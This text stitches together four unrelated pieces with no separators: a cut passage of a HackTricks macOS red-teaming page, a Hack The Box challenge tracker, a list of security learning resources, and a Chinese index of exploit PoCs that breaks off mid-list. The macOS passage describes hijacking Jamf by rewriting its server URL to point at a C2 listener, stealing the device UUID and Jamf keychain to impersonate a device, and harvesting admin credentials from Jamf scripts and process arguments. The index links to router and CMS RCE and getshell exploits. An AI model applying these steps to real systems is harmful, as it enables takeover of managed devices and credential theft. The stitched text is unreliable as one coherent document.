as a **LaunchDaemon** in **`/Library/LaunchAgents/com.jamf.management.agent.plist`** #### JAMF Device Takeover The **JSS** (Jamf Software Server) **URL** that **`jamf`** will use is located in **`/Library/Preferences/com.jamfsoftware.jamf.plist`**. \ This file basically contains the URL: {% code overflow="wrap" %} ```bash plutil -convert xml1 -o - /Library/Preferences/com.jamfsoftware.jamf.plist [...] <key>is_virtual_machine</key> <false/> <key>jss_url</key> <string>https://halbornasd.jamfcloud.com/</string> <key>last_management_framework_change_id</key> <integer>4</integer> [...] ``` {% endcode %} So, an attacker could drop a malicious package (`pkg`) that **overwrites this file** when installed setting the **URL to a Mythic C2 listener from a Typhon agent** to now be able to abuse JAMF as C2. {% code overflow="wrap" %} ```bash # After changing the URL you could wait for it to be reloaded or execute: sudo jamf policy -id 0 # TODO: There is an ID, maybe it's possible to have the real jamf connection and another one to the C2 ``` {% endcode %} #### JAMF Impersonation In order to **impersonate the communication** between a device and JMF you need: * The **UUID** of the device: `ioreg -d2 -c IOPlatformExpertDevice | awk -F" '/IOPlatformUUID/{print $(NF-1)}'` * The **JAMF keychain** from: `/Library/Application\ Support/Jamf/JAMF.keychain` which contains the device certificate With this information, **create a VM** with the **stolen** Hardware **UUID** and with **SIP disabled**, drop the **JAMF keychain,** **hook** the Jamf **agent** and steal its information. #### Secrets stealing <figure><img src="../../.gitbook/assets/image (11).png" alt=""><figcaption><p>a</p></figcaption></figure> You could also monitor the location `/Library/Application Support/Jamf/tmp/` for the **custom scripts** admins might want to execute via Jamf as they are **placed here, executed and removed**. These scripts **might contain credentials**. However, **credentials** might be passed tho these scripts as **parameters**, so you would need to monitor `ps aux | grep -i jamf` (without even being root). The script [**JamfExplorer.py**](https://github.com/WithSecureLabs/Jamf-Attack-Toolkit/blob/master/JamfExplorer.py) can listen for new files being added and new process arguments. ### macOS Remote Access And also about **MacOS** "special" **network** **protocols**: {% content-ref url="../macos-security-and-privilege-escalation/macos-protocols.md" %} [macos-protocols.md](../macos-security-and-privilege-escalation/macos-protocols.md) {% endcontent-ref %} ## Active Directory In some occasions you will find that the **MacOS computer is connected to an AD**. In this scenario you should try to **enumerate** the active directory as you are use to it. Find some **help** in the following pages: {% content-ref url="../../network-services-pentesting/pentesting-ldap.md" %} [pentesting-ldap.md](../../network-services-pentesting/pentesting-ldap.md) {% endcontent-ref %} {% content-ref url="../../windows-hardening/active-directory-methodology/" %} [active-directory-methodology](../../windows-hardening/active-directory-methodology/) {% endcontent-ref %} {% content-ref url="../../network-services-pentesting/pentesting-kerberos-88/" %} [pentesting-kerberos-88](../../network-services-pentesting/pentesting-kerberos-88/) {% endcontent-ref %} Some **local MacOS tool** that may also help you is `dscl`: ```bash dscl "/Active Directory/[Domain]/All Domains" ls / ``` Also there are some tools prepared for MacOS to automatically enumerate the AD and play with kerberos: * [**Machound**](https://github.com/XMCyber/MacHound): MacHound is an extension to the Bloodhound audting tool allowing collecting and ingesting of Active Directory relationships on MacOS hosts. * [**Bifrost**](https://github.com/its-a-feature/bifrost): Bifrost is an Objective-C project designed to interact with the Heimdal krb5 APIs on macOS. The goal of the project is to enable better security testing around Kerberos on macOS devices using native APIs without requiring any other framework or packages on the target. * [**Orchard**](https://github.com/its-a-feature/Orchard): JavaScript for Automation (JXA) tool to do Active Directory enumeration. ### Domain Information ```bash echo show com.apple.opendirectoryd.ActiveDirectory | scutil ``` ### Users The three types of MacOS users are: * **Local Users** โ€” Managed by the local OpenDirectory service, they arenโ€™t connected in any way to the Active Directory. * **Network Users** โ€” Volatile Active Directory users who require a connection to the DC server to authenticate. * **Mobile Users** โ€” Active Directory users with a local backup for their credentials and files. The local information about users and groups is stored in in the folder _/var/db/dslocal/nodes/Default._\ For example, the info about user called _mark_ is stored in _/var/db/dslocal/nodes/Default/users/mark.plist_ and the info about the group _admin_ is in _/var/db/dslocal/nodes/Default/groups/admin.plist_. In addition to using the HasSession and AdminTo edges, **MacHound adds three new edges** to the Bloodhound database: * **CanSSH** - entity allowed to SSH to host * **CanVNC** - entity allowed to VNC to host * **CanAE** - entity allowed to execute AppleEvent scripts on host ```bash #User enumeration dscl . ls /Users dscl . read /Users/[username] dscl "/Active Directory/TEST/All Domains" ls /Users dscl "/Active Directory/TEST/All Domains" read /Users/[username] dscacheutil -q user #Computer enumeration dscl "/Active Directory/TEST/All Domains" ls /Computers dscl "/Active Directory/TEST/All Domains" read "/Computers/[compname]$" #Group enumeration dscl . ls /Groups dscl . read "/Groups/[groupname]" dscl "/Active Directory/TEST/All Domains" ls /Groups dscl "/Active Directory/TEST/All Domains" read "/Groups/[groupname]" #Domain Information dsconfigad -show ``` More info in [https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/](https://its-a-feature.github.io/posts/2018/01/Active-Directory-Discovery-with-a-Mac/) ## Accessing the Keychain The Keychain highly probably contains sensitive information that if accessed withuot generating a prompt could help to move forward a red team exercise: {% content-ref url="macos-keychain.md" %} [macos-keychain.md](macos-keychain.md) {% endcontent-ref %} ## External Services MacOS Red Teaming is different from a regular Windows Red Teaming as usually **MacOS is integrated with several external platforms directly**. A common configuration of MacOS is to access to the computer using **OneLogin synchronised credentials, and accessing several external services** (like github, aws...) via OneLogin: ![](<../../.gitbook/assets/image (563).png>) ## Misc Red Team techniques ### Safari When a file is downloaded in Safari, if its a "safe" file, it will be **automatically opened**. So for example, if you **download a zip**, it will be automatically decompressed: <figure><img src="../../.gitbook/assets/image (12) (3).png" alt=""><figcaption></figcaption></figure> ## References * [**https://www.youtube.com/watch?v=IiMladUbL6E**](https://www.youtube.com/watch?v=IiMladUbL6E) * [**https://medium.com/xm-cyber/introducing-machound-a-solution-to-macos-active-directory-based-attacks-2a425f0a22b6**](https://medium.com/xm-cyber/introducing-machound-a-solution-to-macos-active-directory-based-attacks-2a425f0a22b6) * [**https://gist.github.com/its-a-feature/1a34f597fb30985a2742bb16116e74e0**](https://gist.github.com/its-a-feature/1a34f597fb30985a2742bb16116e74e0) * [**Come to the Dark Side, We Have Apples: Turning macOS Management Evil**](https://www.youtube.com/watch?v=pOQOh07eMxY) * [**OBTS v3.0: "An Attackers Perspective on Jamf Configurations" - Luke Roberts / Calum Hall**](https://www.youtube.com/watch?v=ju1IYWUv4ZA) <details> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>โ˜๏ธ HackTricks Cloud โ˜๏ธ</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>๐Ÿฆ Twitter ๐Ÿฆ</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>๐ŸŽ™๏ธ Twitch ๐ŸŽ™๏ธ</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>๐ŸŽฅ Youtube ๐ŸŽฅ</strong></a></summary> * Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! * Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) * Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) * **Join the** [**๐Ÿ’ฌ**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**๐Ÿฆ**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud). </details>
# Hack The Box [Hack The Box](https://www.hackthebox.eu) is an online platform allowing you to test and advance your skills in cyber security. **Reversing 4/10** | Title | Points | Status | WriteUp | | :---: | :---: | :---: | :---: | | Crack This! | 80 | :disappointed_relieved: | | | The Art of Reversing | 40 | :disappointed_relieved: | | | Tear Or Dear | 20 | :disappointed_relieved: | | | Bombs Landed | 80 | :disappointed_relieved: | | | Find The Easy Pass | 20 | :wink: | TBD | | Eat the Cake! | 60 | :wink: | TBD | | Pseudo | 90 | :disappointed_relieved: | | | Impossible Password | 30 | :wink: | TBD | | Find The Secret Flag | 50 | :disappointed_relieved: | | | Snake | 10 | :wink: | TBD | **Cryptography 7/11** | Title | Points | Status | WriteUp | | :---: | :---: | :---: | :---: | | Weak RSA | 20 | :wink: | [link](https://github.com/ajdumanhug/hackthebox/tree/master/crypto/weak-rsa) | | Sick Teacher | 20 | :wink: | [link](https://github.com/ajdumanhug/hackthebox/tree/master/crypto/sick-teacher) | | Classic, yet complicated! | 10 | :wink: | [link](https://github.com/ajdumanhug/hackthebox/tree/master/crypto/class-yet-complicated) | Infinite Descent | 90 | :disappointed_relieved: | | | Deceitful Batman | 10 | :wink: | [link](https://github.com/ajdumanhug/hackthebox/tree/master/crypto/deceitful-batman) | | Ebola Virus | 100 | :disappointed_relieved: | | | You Can Do It! | 10 | :wink: | [link](https://github.com/ajdumanhug/hackthebox/tree/master/crypto/you-can-do-it) | | Brainy's Cipher | 30 | :wink: | [link](https://github.com/ajdumanhug/hackthebox/tree/master/crypto/brainys-cipher) | | Keys | 40 | :wink: | [link](https://github.com/ajdumanhug/hackthebox/tree/master/crypto/keys) | | Mission Impossible | 90 | :disappointed_relieved: | | | Please, don't share! | 80 | :disappointed_relieved: | | **Steganography 13/17** | Title | Points | Status | WriteUp | | :---: | :---: | :---: | :---: | | Raining Blood | 40 | :wink: | [link](https://github.com/ajdumanhug/hackthebox/tree/master/stego/raining-blood) | | Monstrosity | 90 | :disappointed_relieved: | | | BitsNBytes | 70 | :disappointed_relieved: | | | Widescreen | 20 | :wink: | [link](https://github.com/ajdumanhug/hackthebox/tree/master/stego/widescreen) | | Hackerman | 30 | :wink: | [link](https://github.com/ajdumanhug/hackthebox/tree/master/stego/hackerman) | | Hidden in Colors | 70 | :wink: | TBD | | Milkshake | 10 | :wink: | [link](https://github.com/ajdumanhug/hackthebox/tree/master/stego/milkshake) | | Digital Cube | 60 | :wink: | [link](https://github.com/ajdumanhug/hackthebox/tree/master/stego/digital-cube) | | Forest | 40 | :wink: | [link](https://github.com/ajdumanhug/hackthebox/tree/master/stego/forest) | Da Vinci | 30 | :wink: | [link](https://github.com/ajdumanhug/hackthebox/tree/master/stego/da-vinci) | | Beatles | 30 | :wink: | [link](https://github.com/ajdumanhug/hackthebox/tree/master/stego/beatles) | | Unified | 20 | :wink: | [link](https://github.com/ajdumanhug/hackthebox/tree/master/stego/unified) | | Pusheen Loves Graphs | 30 | :wink: | [link](https://github.com/ajdumanhug/hackthebox/tree/master/stego/pusheen-loves-graphs) | | Retro | 50 | :wink: | TBD | | Senseless Behaviour | 50 | :wink: | [link](https://github.com/ajdumanhug/hackthebox/tree/master/stego/senseless-behaviour) | | Not Art | 70 | :disappointed_relieved: | | | Massacre | 100 | :disappointed_relieved: | | **Pwn 0/5** | Title | Points | Status | WriteUp | | :---: | :---: | :---: | :---: | | Ropme | 80 | :disappointed_relieved: | | | Little Tommy | 40 | :disappointed_relieved: | | | Dream Diary: Chapter 1 | 90 | :disappointed_relieved: | | | Dream Diary: Chapter 2 | 90 | :disappointed_relieved: | | | Old Bridge | 80 | :disappointed_relieved: | | **Web 5/5** | Title | Points | Status | WriteUp | | :---: | :---: | :---: | :---: | | HDC | 30 | :wink: | [link](https://github.com/ajdumanhug/hackthebox/tree/master/web/hdc) | | I know Mag1k | 50 | :wink: | TBD | | Grammar | 70 | :wink: | TBD | | Lernaean | 20 | :wink: | [link](https://github.com/ajdumanhug/hackthebox/tree/master/web/lernaean) | | Cartographer | 30 | :wink: | [link](https://github.com/ajdumanhug/hackthebox/tree/master/web/cartographer) **Misc 7/8** | Title | Points | Status | WriteUp | | :---: | :---: | :---: | :---: | | fs0ciety | 30 | :wink: | TBD | | 0ld is g0ld | 10 | :wink: | TBD | | Art | 20 | :wink: | TBD | | Inferno | 20 | :wink: | TBD | | misDIRection | 20 | :wink: | TBD | | Eternal Loop | 20 | :disappointed_relieved: | | | Longbottom's Locker | 20 | :wink: | TBD | | Blackhole | 20 | :wink: | TBD | **Forensics 0/5** | Title | Points | Status | WriteUp | | :---: | :---: | :---: | :---: | | Marshal in the Middle | 40 | :disappointed_relieved: | | | Deadly Arthropod | 40 | :disappointed_relieved: | | | Reminiscent | 40 | :disappointed_relieved: | | | Keep Tryin' | 50 | :disappointed_relieved: | | | Blue Shadow | 60 | :disappointed_relieved: | | **Mobile 0/1** | Title | Points | Status | WriteUp | | :---: | :---: | :---: | :---: | | Cryptohorrific | 40 | :disappointed_relieved: | | **Pwned Machines** | Machine Name | OS | User | Root | Status | WriteUp | | :---: | :---: | :---: | :---: | :---: | :---: | | Jerry | <img src="https://www.hackthebox.eu/images/win.png" width="20" height="20"> | :wink: | :wink: | Active | TBD | | Poison | <img src="https://www.hackthebox.eu/images/freebsd.png" width="20" height="20"> | :wink: | :wink: | Retired | TBD |
## A Repository of resources to learn Cyber Security Topics From: I will try to break the resources in Major Categories and then break them down into more niche topics when needed :). Please feel free to make a pull request with a resource you wanna add or if you wanna make some Contributions as well. Also this library is not complete i will be adding more resources as I come across them. If you have any Feedback feel free to reach out to me. ### Starting Out: This section will have some of the resources i used when i was starting in the field of Cybersecurity and some i feel would help people out in getting their knowledge up in the field of CyberSecurity. 1. **Tryhackme** : https://tryhackme.com/ : This is hands down the best resource in my humble opinion to get started with, It has a lot walkthrough boxes, guides, and teaches you the basics very well i have learnt soo soo much from Tryhackme i would highly recommend to any one starting or even to someone who is InfoSec for a while as it has contents for all skill levels. 1.1. I would highly recommend starting with the Begginer Path for which you would have to Pathy 10$ a month but its highly worth it and you get tons more things with it. 1.2. If you dont want to get the Premium Subscription just yet try following the free path from Tryhackme which you can find here : https://blog.tryhackme.com/free_path/ 2. **Hackthebox Academy** : https://academy.hackthebox.eu/ : This is another resource that recently released but it is more on the paid side for most of their content but they do have some great and detailed free modules which i would highly recommend. Some of the free content includes stuff like Linux Fundamentals , Introduction to Networking, etc. 3. **Penetration Testing Student course from INE** : https://checkout.ine.com/starter-pass : This is another great resource to get started in Penetration Testing even if you have no prior background in IT, this course will help you out a lot and get you set with your Fundamentals in the field of Cybersecurity the PTS course is the course for their certification eJPT which I would highly recommend as well but it costs around 200$ for get 1 attempt which includes a free retake which is a very good price in my opinion. 4. **Hacker101** : https://www.hacker101.com/playlists/newcomers : So if you are looking to get into the Field of Bug Bounty and Web Security this is a great resource to start with they have video tutorials / CTFs to test your skills and docs. 5. **TCM Practical Ethical Hacking Course** : https://academy.tcm-sec.com/p/practical-ethical-hacking-the-complete-course : This is another great resource i would highly recommend to anyone planning to get into the field of Cybersecurity , This course goes through a lot of topics like AD Hacking, Exploit Development, Networking, Scripting, Web Security, Network Security and much more and all of the content is very well explained and taught. ### OSCP Preparation: 1. **OSCP Labs**: https://www.offensive-security.com/pwk-oscp/ : [ $999 - $1400 ] : The best resource to start your preparation for the OSCP is the official labs as they provide a good overview of how and what to expect in the exam and its made to prepare you for the exam. 2. **Offensive Security Proving Grounds**: https://portal.offensive-security.com/sign-up/pg : [ $20 per month ] This in my opinion is an amazing resource to study and prepare for the OSCP for as it provides a very good idea of how the difficulty works in Offsec exams etc. and i personally learned a lot of new things and techniques from the platform i would recommend mostly all of the Easy/Medium boxes (Some Boxes are preety hard, so dont worry if you can't get the boxes without Hints/Walkthroughs offered by Offsec on the Platform). If you can't do all the boxes i would highly recommend doing the boxes mentioned in TJNull List which i have mentioned later on. 3. **Virtual Hacking Labs** : https://www.virtualhackinglabs.com/ : [ $99 per month ] : This is another great resource i stumbled accrosss while researching for OSCP and it turned out to be a great resource for preperation of the exam. Its a little expensive, but its a very good lab. They also have a course that they teach which is also very well laid out in case you want some extra preparation and material to learn from. 4. **TJ Null List** : https://docs.google.com/spreadsheets/d/1dwSMIAPIam0PuRBkCiDI88pU3yzrqqHkDtBngUHNCw8/edit#gid=1839402159 : This is a very good list created by one of the mentors from Offsec called TJNull and its a list of basically boxes that are OSCP like and are good to prepare for the exam. It has boxes from all kinds of platform like HTB, Vulnhub, Tryhackme, Proving Grounds and so on. ### Active Directory Penetration Testing: So Active Directory is a very important topic a lot of people overlook in Cybersecurity so I wanted to point out some good resources i found to learn about Active Directory. 1. **Tryhackme Active Directory Basics** : https://tryhackme.com/room/activedirectorybasics : [ Available with Tryhackme Premium : Paid ] : This is a great room that will give you the basic knowledge around Active Directory , it covers a lot of topics like how Active Directory is structured what it is, Active Directory on premise, on cloud, etc, what policies, trusts, forests are. 2. **Building an Active Directory Lab** : https://robertscocca.medium.com/building-an-active-directory-lab-82170dd73fb4 : [Free] : What better way to learn about something then build it yourself you can use the basic knowledge you gained above and try to apply it here and make your own home lab you would have to have some RAM and storage to set it up but leaving that all VMs and everything is free . Even if you don't wanna make a lab i would recommend going through the article and getting some basic idea of how it would work. 3. **IRed Team** : https://www.ired.team/ : [ Free ] This is another great resource to find some common offensive security techniques, red teaming techniques, and it has in depth details about the attacks they demonstrate. 4. **ADSecurity** : https://adsecurity.org/ : This is another great resource to learn stuff for free about PowerShell, Enterprise Security, Active Directory security, methods to defend against such attacks, etc. 5. **CRTP** : https://www.pentesteracademy.com/activedirectorylab : https://bootcamps.pentesteracademy.com/course/ad-beginner-may-21 : [Paid : Atleast 300$ for 30days ] : This is a paid resource but a very good one in this Nikhil Mittal who is a very known person in the field of Cyber Security teaches you Active Directory from the basics, some basics PowerShell commands, how AD works how to be stealthy in a RedTeaming engagement and some techniques, though in this case i would highly recommend the live boot camp as you can ask more questions etc. directly on spot.
## <span id="head1"> Penetration_Testing_POC</span> ๆœ้›†ๆœ‰ๅ…ณๆธ—้€ๆต‹่ฏ•ไธญ็”จๅˆฐ็š„POCใ€่„šๆœฌใ€ๅทฅๅ…ทใ€ๆ–‡็ซ ็ญ‰ๅงฟๅŠฟๅˆ†ไบซ๏ผŒไฝœไธบ็ฌ”่ฎฐๅง๏ผŒๆฌข่ฟŽ่กฅๅ……ใ€‚ - [ Penetration_Testing_POC](#head1) - [ ่ฏทๅ–„็”จๆœ็ดข[`Ctrl+F`]ๆŸฅๆ‰พ](#head2) - [IOT Device&Mobile Phone](#head3) - [Web APP](#head4) - [ ๆๆƒ่พ…ๅŠฉ็›ธๅ…ณ](#head5) - [ PC](#head6) - [ tools-ๅฐๅทฅๅ…ท้›†ๅˆ](#head7) - [ ๆ–‡็ซ /ไนฆ็ฑ/ๆ•™็จ‹็›ธๅ…ณ](#head8) - [ ่ฏดๆ˜Ž](#head9) ## <span id="head2"> ่ฏทๅ–„็”จๆœ็ดข[`Ctrl+F`]ๆŸฅๆ‰พ</span> ## <span id="head3">IOT Device&Mobile Phone</span> - [ๅคฉ็ฟผๅˆ›็ปดawifi่ทฏ็”ฑๅ™จๅญ˜ๅœจๅคšๅค„ๆœชๆŽˆๆƒ่ฎฟ้—ฎๆผๆดž](ๅคฉ็ฟผๅˆ›็ปดawifi่ทฏ็”ฑๅ™จๅญ˜ๅœจๅคšๅค„ๆœชๆŽˆๆƒ่ฎฟ้—ฎๆผๆดž.md) - [ๅŽไธบWS331aไบงๅ“็ฎก็†้กต้ขๅญ˜ๅœจCSRFๆผๆดž](ๅŽไธบWS331aไบงๅ“็ฎก็†้กต้ขๅญ˜ๅœจCSRFๆผๆดž.md) - [CVE-2019-16313 ่œ‚็ฝ‘ไบ’่”ไผไธš็บง่ทฏ็”ฑๅ™จv4.31ๅฏ†็ ๆณ„้œฒๆผๆดž](./CVE-2019-16313%20่œ‚็ฝ‘ไบ’่”ไผไธš็บง่ทฏ็”ฑๅ™จv4.31ๅฏ†็ ๆณ„้œฒๆผๆดž.md) - [D-Link่ทฏ็”ฑๅ™จRCEๆผๆดž](./CVE-2019-16920-D-Link-rce.md) - [CVE-2019-13051-Pi-Hole่ทฏ็”ฑ็ซฏๅŽปๅนฟๅ‘Š่ฝฏไปถ็š„ๅ‘ฝไปคๆณจๅ…ฅ&ๆƒ้™ๆๅ‡](./CVE-2019-13051) - [D-Link DIR-859โ€Š-โ€ŠRCE UnAutenticated (CVE-2019โ€“17621)](https://github.com/s1kr10s/D-Link-DIR-859-RCE) - [Huawei HG255 Directory Traversal[็›ฎๅฝ•็ฉฟ่ถŠ]](https://packetstormsecurity.com/files/155954/huaweihg255-traversal.rb.txt)|[ๆœฌๅœฐๅค‡ไปฝๆ–‡ไปถ](./tools/huaweihg255-traversal.rb) - [D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit)CVE-2019-20215(Metasploit)](./POC_Details/D-Link%20Devices%20-%20Unauthenticated%20Remote%20Command%20Execution%20in%20ssdpcgi%20(Metasploit)%20CVE-2019-20215.rb) - [ไปŽ Interfaces.d ๅˆฐ RCE๏ผšMozilla WebThings IoT ็ฝ‘ๅ…ณๆผๆดžๆŒ–ๆŽ˜](https://research.nccgroup.com/2020/02/10/interfaces-d-to-rce/) - [ๅฐ็ฑณ็ณปๅˆ—่ทฏ็”ฑๅ™จ่ฟœ็จ‹ๅ‘ฝไปคๆ‰ง่กŒๆผๆดž๏ผˆCVE-2019-18370๏ผŒCVE-2019-18371๏ผ‰](https://github.com/UltramanGaia/Xiaomi_Mi_WiFi_R3G_Vulnerability_POC/blob/master/report/report.md) - [Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload-ๆœช็ป้ชŒ่ฏๅณๅฏๆ›ฟๆขๅ›บไปถ)](https://www.exploit-db.com/exploits/48158) - [cve-2020-8634&cve-2020-8635](https://www.exploit-db.com/exploits/48160)|[Wing FTP Server 6.2.3ๆƒ้™ๆๅ‡ๆผๆดžๅ‘็Žฐๅˆ†ๆžๅค็Žฐ่ฟ‡็จ‹](https://www.hooperlabs.xyz/disclosures/cve-2020-8635.php)|[Wing FTP Server 6.2.5ๆƒ้™ๆๅ‡](https://www.exploit-db.com/exploits/48154) - [CVE-2020-9374-TP LINK TL-WR849N - RCE](./CVE-2020-9374.md) - [CVE-2020-12753-LG ๆ™บ่ƒฝๆ‰‹ๆœบไปปๆ„ไปฃ็ ๆ‰ง่กŒๆผๆดž](https://github.com/shinyquagsire23/CVE-2020-12753-PoC) - [CVE-2020-12695-UPnP ๅฎ‰ๅ…จๆผๆดž](https://github.com/yunuscadirci/CallStranger) - [79ๆฌพ Netgear ่ทฏ็”ฑๅ™จ้ญ่ฟœ็จ‹ๆŽฅ็ฎก0day](https://github.com/grimm-co/NotQuite0DayFriday/blob/master/2020.06.15-netgear/exploit.py) - [dlink-dir610-exploits-Exploits for CVE-2020-9376 and CVE-2020-9377](https://github.com/renatoalencar/dlink-dir610-exploits) ## <span id="head4">Web APP</span> - [่‡ด่ฟœOA_A8_getshell_0day](่‡ด่ฟœOA_A8_getshell_0day.md) - [Couch through 2.0ๅญ˜ๅœจ่ทฏๅพ„ๆณ„้œฒๆผๆดž ](Couch%20through%202.0ๅญ˜ๅœจ่ทฏๅพ„ๆณ„้œฒๆผๆดž.md) - [Cobub Razor 0.7.2ๅญ˜ๅœจ่ทจ็ซ™่ฏทๆฑ‚ไผช้€ ๆผๆดž](Cobub%20Razor%200.7.2ๅญ˜ๅœจ่ทจ็ซ™่ฏทๆฑ‚ไผช้€ ๆผๆดž.md) - [joyplus-cms 1.6.0ๅญ˜ๅœจCSRFๆผๆดžๅฏๅขžๅŠ ็ฎก็†ๅ‘˜่ดฆๆˆท](joyplus-cms%201.6.0ๅญ˜ๅœจCSRFๆผๆดžๅฏๅขžๅŠ ็ฎก็†ๅ‘˜่ดฆๆˆท.md) - [MiniCMS 1.10ๅญ˜ๅœจCSRFๆผๆดžๅฏๅขžๅŠ ็ฎก็†ๅ‘˜่ดฆๆˆท](MiniCMS%201.10ๅญ˜ๅœจCSRFๆผๆดžๅฏๅขžๅŠ ็ฎก็†ๅ‘˜่ดฆๆˆท.md) - [Z-Blog 1.5.1.1740ๅญ˜ๅœจXSSๆผๆดž](Z-Blog%201.5.1.1740ๅญ˜ๅœจXSSๆผๆดž.md) - [YzmCMS 3.6ๅญ˜ๅœจXSSๆผๆดž](YzmCMS%203.6ๅญ˜ๅœจXSSๆผๆดž.md) - [Cobub Razor 0.7.2่ถŠๆƒๅขžๅŠ ็ฎก็†ๅ‘˜่ดฆๆˆท](Cobub%20Razor%200.7.2่ถŠๆƒๅขžๅŠ ็ฎก็†ๅ‘˜่ดฆๆˆท.md) - [Cobub Razor 0.8.0ๅญ˜ๅœจSQLๆณจๅ…ฅๆผๆดž](Cobub%20Razor%200.8.0ๅญ˜ๅœจSQLๆณจๅ…ฅๆผๆดž.md) - [Cobub Razor 0.8.0ๅญ˜ๅœจ็‰ฉ็†่ทฏๅพ„ๆณ„้œฒๆผๆดž](Cobub%20Razor%200.8.0ๅญ˜ๅœจ็‰ฉ็†่ทฏๅพ„ๆณ„้œฒๆผๆดž.md) - [ไบ”ๆŒ‡CMS 4.1.0ๅญ˜ๅœจCSRFๆผๆดžๅฏๅขžๅŠ ็ฎก็†ๅ‘˜่ดฆๆˆท](ไบ”ๆŒ‡CMS%204.1.0ๅญ˜ๅœจCSRFๆผๆดžๅฏๅขžๅŠ ็ฎก็†ๅ‘˜่ดฆๆˆท.md) - [DomainMod็š„XSS้›†ๅˆ](DomainMod็š„XSS้›†ๅˆ.md) - [GreenCMS v2.3.0603ๅญ˜ๅœจCSRFๆผๆดžๅฏ่Žทๅ–webshell&ๅขžๅŠ ็ฎก็†ๅ‘˜่ดฆๆˆท](GreenCMS%20v2.3.0603ๅญ˜ๅœจCSRFๆผๆดžๅฏ่Žทๅ–webshell&ๅขžๅŠ ็ฎก็†ๅ‘˜่ดฆๆˆท.md) - [yii2-statemachine v2.x.xๅญ˜ๅœจXSSๆผๆดž](yii2-statemachine%20v2.x.xๅญ˜ๅœจXSSๆผๆดž.md) - [maccms_v10ๅญ˜ๅœจCSRFๆผๆดžๅฏๅขžๅŠ ไปปๆ„่ดฆๅท](maccms_v10ๅญ˜ๅœจCSRFๆผๆดžๅฏๅขžๅŠ ไปปๆ„่ดฆๅท.md) - [LFCMS 3.7.0ๅญ˜ๅœจCSRFๆผๆดžๅฏๆทปๅŠ ไปปๆ„็”จๆˆท่ดฆๆˆทๆˆ–ไปปๆ„็ฎก็†ๅ‘˜่ดฆๆˆท](LFCMS%203.7.0ๅญ˜ๅœจCSRFๆผๆดžๅฏๆทปๅŠ ไปปๆ„็”จๆˆท่ดฆๆˆทๆˆ–ไปปๆ„็ฎก็†ๅ‘˜่ดฆๆˆท.md) - [Finecms_v5.4ๅญ˜ๅœจCSRFๆผๆดžๅฏไฟฎๆ”น็ฎก็†ๅ‘˜่ดฆๆˆทๅฏ†็ ](Finecms_v5.4ๅญ˜ๅœจCSRFๆผๆดžๅฏไฟฎๆ”น็ฎก็†ๅ‘˜่ดฆๆˆทๅฏ†็ .md) - [Amazon Kindle Fire HD (3rd Generation)ๅ†…ๆ ธ้ฉฑๅŠจๆ‹’็ปๆœๅŠกๆผๆดž](Amazon%20Kindle%20Fire%20HD%20\(3rd%20Generation\)ๅ†…ๆ ธ้ฉฑๅŠจๆ‹’็ปๆœๅŠกๆผๆดž.md) - [Metinfo-6.1.2็‰ˆๆœฌๅญ˜ๅœจXSSๆผๆดž&SQLๆณจๅ…ฅๆผๆดž](Metinfo-6.1.2็‰ˆๆœฌๅญ˜ๅœจXSSๆผๆดž&SQLๆณจๅ…ฅๆผๆดž.md) - [Hucart cms v5.7.4 CSRFๆผๆดžๅฏไปปๆ„ๅขžๅŠ ็ฎก็†ๅ‘˜่ดฆๅท](Hucart%20cms%20v5.7.4%20CSRFๆผๆดžๅฏไปปๆ„ๅขžๅŠ ็ฎก็†ๅ‘˜่ดฆๅท.md) - [indexhibit cms v2.1.5 ็›ดๆŽฅ็ผ–่พ‘phpๆ–‡ไปถgetshell](indexhibit%20cms%20v2.1.5%20็›ดๆŽฅ็ผ–่พ‘phpๆ–‡ไปถgetshell.md) - [S-CMSไผไธšๅปบ็ซ™็ณป็ปŸPHP็‰ˆv3.0ๅŽๅฐๅญ˜ๅœจCSRFๅฏๆทปๅŠ ็ฎก็†ๅ‘˜ๆƒ้™่ดฆๅท](S-CMSไผไธšๅปบ็ซ™็ณป็ปŸPHP็‰ˆv3.0ๅŽๅฐๅญ˜ๅœจCSRFๅฏๆทปๅŠ ็ฎก็†ๅ‘˜ๆƒ้™่ดฆๅท.md) - [S-CMS PHP v3.0ๅญ˜ๅœจSQLๆณจๅ…ฅๆผๆดž](S-CMS%20PHP%20v3.0ๅญ˜ๅœจSQLๆณจๅ…ฅๆผๆดž.md) - [MetInfoCMS 5.X็‰ˆๆœฌGETSHELLๆผๆดžๅˆ้›†](MetInfoCMS%205.X็‰ˆๆœฌGETSHELLๆผๆดžๅˆ้›†.md) - [discuz ml RCE ๆผๆดžๆฃ€ๆต‹ๅทฅๅ…ท](discuz-ml-rce/README.md) - [thinkphp5ๆก†ๆžถ็ผบ้™ทๅฏผ่‡ด่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒ](thinkphp5ๆก†ๆžถ็ผบ้™ทๅฏผ่‡ด่ฟœ็จ‹ไปฃ็ ๆ‰ง่กŒ.md) - [FineCMS_v5.0.8ไธคๅค„getshell](FineCMS_v5.0.8ไธคๅค„getshell.md) - [Struts2_045ๆผๆดžๆ‰น้‡ๆฃ€ๆต‹|ๆœ็ดขๅผ•ๆ“Ž้‡‡้›†ๆ‰ซๆ](Struts2_045-Poc) - 